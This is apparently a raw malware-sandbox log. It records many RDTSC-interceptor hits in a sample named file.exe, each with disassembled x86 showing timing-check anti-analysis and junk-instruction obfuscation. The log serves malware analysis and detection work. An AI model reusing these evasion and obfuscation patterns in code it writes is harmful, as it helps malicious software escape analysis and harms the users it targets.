              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FCABF second address: 1FCAC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37A269 second address: 37A286 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524BBh 0x00000007 jmp 00007FBF3CE524BEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37A286 second address: 37A2A1 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBF3CD0A8B6h 0x00000008 jmp 00007FBF3CD0A8B0h 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3795F3 second address: 3795FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37C8FB second address: 37C90C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF3CD0A8ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37C90C second address: 37C932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FBF3CE524BFh 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 jnc 00007FBF3CE524B6h 0x0000001b pop esi 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37C932 second address: 37C94C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBF3CD0A8ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37C94C second address: 1FCABF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a add dword ptr [ebp+122D2104h], ecx 0x00000010 push dword ptr [ebp+122D0F59h] 0x00000016 mov si, cx 0x00000019 call dword ptr [ebp+122D1D92h] 0x0000001f pushad 0x00000020 add dword ptr [ebp+122D22BBh], ecx 0x00000026 jmp 00007FBF3CE524C1h 0x0000002b xor eax, eax 0x0000002d sub dword ptr [ebp+122D22BBh], esi 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 cld 0x00000038 mov dword ptr [ebp+122D2104h], edi 0x0000003e mov dword ptr [ebp+122D2B37h], eax 0x00000044 mov dword ptr [ebp+122D2440h], edi 0x0000004a mov esi, 0000003Ch 0x0000004f jmp 00007FBF3CE524C9h 0x00000054 sub dword ptr [ebp+122D22BBh], ecx 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e jmp 00007FBF3CE524C9h 0x00000063 lodsw 0x00000065 pushad 0x00000066 jmp 00007FBF3CE524C9h 0x0000006b popad 0x0000006c add eax, dword ptr [esp+24h] 0x00000070 sub dword ptr [ebp+122D2440h], ebx 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a mov dword ptr [ebp+122D2440h], ecx 0x00000080 mov dword ptr [ebp+122D2440h], edx 0x00000086 push eax 0x00000087 push eax 0x00000088 push edx 0x00000089 push ecx 0x0000008a pushad 0x0000008b popad 0x0000008c pop ecx 0x0000008d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37CA02 second address: 37CA5F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FBF3CD0A8B6h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007FBF3CD0A8B8h 0x00000019 jl 00007FBF3CD0A8A6h 0x0000001f popad 0x00000020 jmp 00007FBF3CD0A8AAh 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b jns 00007FBF3CD0A8A6h 0x00000031 push ecx 0x00000032 pop ecx 0x00000033 popad 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37CA5F second address: 37CA7F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBF3CE524C2h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37CB6A second address: 37CB6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37CB6F second address: 37CB74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37CDE2 second address: 37CDE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37CDE6 second address: 37CDEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38E7B9 second address: 38E7C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FBF3CD0A8A6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36F17E second address: 36F184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39B241 second address: 39B25D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FBF3CD0A8B3h 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39B25D second address: 39B263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39B263 second address: 39B27F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBF3CD0A8ACh 0x0000000a popad 0x0000000b jc 00007FBF3CD0A8C8h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39B27F second address: 39B285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39B285 second address: 39B289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39B289 second address: 39B293 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBF3CE524B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39B591 second address: 39B595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39B595 second address: 39B5B3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBF3CE524C6h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39B97E second address: 39B983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39BAE9 second address: 39BB08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF3CE524C8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39BC49 second address: 39BC4E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39BDE2 second address: 39BDF5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBF3CE524BEh 0x00000008 pushad 0x00000009 popad 0x0000000a jc 00007FBF3CE524B6h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39BDF5 second address: 39BDFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39BDFB second address: 39BE2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jbe 00007FBF3CE524B6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jnc 00007FBF3CE524B6h 0x0000001a popad 0x0000001b push eax 0x0000001c pushad 0x0000001d popad 0x0000001e jmp 00007FBF3CE524C2h 0x00000023 pop eax 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39BE2C second address: 39BE31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39BE31 second address: 39BE4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF3CE524BEh 0x00000009 jnc 00007FBF3CE524B6h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39C100 second address: 39C10C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FBF3CD0A8A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39369C second address: 3936BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBF3CE524B6h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBF3CE524C3h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3936BC second address: 3936C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3936C0 second address: 3936D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jc 00007FBF3CE524C4h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D78C second address: 36D790 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D790 second address: 36D798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D798 second address: 36D7BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBF3CD0A8B7h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D7BE second address: 36D7C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FBF3CE524B6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D7C9 second address: 36D7D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D7D1 second address: 36D7E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBF3CE524BCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D7E7 second address: 36D7EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D7EB second address: 36D7EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39D0DA second address: 39D0DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39D0DE second address: 39D0E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39D0E2 second address: 39D0F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jg 00007FBF3CD0A8A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3013 second address: 3A3017 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3E07 second address: 3A3E0C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3E0C second address: 3A3E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop ebx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3E1A second address: 3A3E1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A45D5 second address: 3A45DF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBF3CE524B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A45DF second address: 3A45E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A5671 second address: 3A56A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FBF3CE524BAh 0x00000010 push edi 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A56A8 second address: 3A56AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A9017 second address: 3A901D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A893F second address: 3A8962 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CD0A8B5h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AA5FE second address: 3AA604 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AB0A9 second address: 3AB0AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AB40A second address: 3AB40E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3ACB74 second address: 3ACB8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FBF3CD0A8AEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AD1E4 second address: 3AD1F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 370CE8 second address: 370CF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jbe 00007FBF3CD0A8B2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 370CF5 second address: 370CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B0D56 second address: 3B0D5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B0D5C second address: 3B0DAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b cmc 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007FBF3CE524B8h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a and di, DDC7h 0x0000002f push edx 0x00000030 jmp 00007FBF3CE524C6h 0x00000035 pop edi 0x00000036 xchg eax, ebx 0x00000037 pushad 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B0DAA second address: 3B0DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FBF3CD0A8A6h 0x0000000a popad 0x0000000b jg 00007FBF3CD0A8ACh 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FBF3CD0A8B1h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B0DD8 second address: 3B0DDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B0DDC second address: 3B0DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B2B86 second address: 3B2C13 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a ja 00007FBF3CE524C7h 0x00000010 pop edi 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007FBF3CE524B8h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c mov edi, dword ptr [ebp+122D28E7h] 0x00000032 push 00000000h 0x00000034 sub dword ptr [ebp+122D347Fh], edi 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ecx 0x0000003f call 00007FBF3CE524B8h 0x00000044 pop ecx 0x00000045 mov dword ptr [esp+04h], ecx 0x00000049 add dword ptr [esp+04h], 00000016h 0x00000051 inc ecx 0x00000052 push ecx 0x00000053 ret 0x00000054 pop ecx 0x00000055 ret 0x00000056 xor dword ptr [ebp+122D1C95h], ecx 0x0000005c xchg eax, ebx 0x0000005d jmp 00007FBF3CE524BCh 0x00000062 push eax 0x00000063 jp 00007FBF3CE524C0h 0x00000069 pushad 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B3D89 second address: 3B3D96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B7FCC second address: 3B7FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8D62 second address: 3B8D67 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8D67 second address: 3B8D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8D74 second address: 3B8D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8D78 second address: 3B8D7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B9C5E second address: 3B9CD6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D1A16h], edx 0x00000010 adc di, 6EC3h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007FBF3CD0A8A8h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 xchg eax, esi 0x00000034 jnp 00007FBF3CD0A8BEh 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d jo 00007FBF3CD0A8BBh 0x00000043 jmp 00007FBF3CD0A8B5h 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B9DAA second address: 3B9DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FBF3CE524B6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B9DB5 second address: 3B9DE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF3CD0A8ABh 0x00000008 jmp 00007FBF3CD0A8B8h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push ecx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BAEDB second address: 3BAEEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF3CE524BAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BAEEA second address: 3BAF5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+1244D8EFh] 0x00000010 push dword ptr fs:[00000000h] 0x00000017 jp 00007FBF3CD0A8BCh 0x0000001d jmp 00007FBF3CD0A8B6h 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 mov ebx, esi 0x0000002b mov eax, dword ptr [ebp+122D04D5h] 0x00000031 sbb bl, 00000018h 0x00000034 push FFFFFFFFh 0x00000036 jbe 00007FBF3CD0A8C4h 0x0000003c pushad 0x0000003d call 00007FBF3CD0A8B9h 0x00000042 pop ebx 0x00000043 mov edi, ebx 0x00000045 popad 0x00000046 push eax 0x00000047 push esi 0x00000048 push eax 0x00000049 push edx 0x0000004a push ecx 0x0000004b pop ecx 0x0000004c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BBE5B second address: 3BBE7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jnl 00007FBF3CE524B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BBE7B second address: 3BBE80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
